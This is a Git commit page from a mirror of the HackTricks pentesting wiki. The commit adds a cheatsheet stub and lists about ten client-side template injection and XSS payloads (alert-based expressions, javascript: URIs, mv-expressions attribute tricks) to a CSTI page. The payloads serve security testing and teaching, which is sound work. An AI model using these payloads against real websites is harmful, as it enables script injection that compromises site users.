Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 3 pages modified

Browse source
This commit is contained in:
CPol 2021-06-25 16:39:43 +00:00 committed by gitbook-bot
parent 804dd1d0d8
commit dbdd4bb37c
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 19 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
SUMMARY.md
View file

@ -336,6 +336,7 @@
## Pentesting Web
* [PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet.md)
* [2FA/OTP Bypass](pentesting-web/2fa-bypass.md)
* [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
* [Bypass Payment Process](pentesting-web/bypass-payment-process.md)

10
pentesting-web/client-side-template-injection-csti.md
View file

@ -56,10 +56,20 @@ Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
Payload:
```text
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
```
**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)\*\*\*\*
\*\*\*\*

8
pentesting-web/pocs-and-polygloths-cheatsheet.md Normal file
View file

@ -0,0 +1,8 @@
# PoCs and Polygloths CheatSheet
### Client Side Template Injection
```text
{{7*7}}
```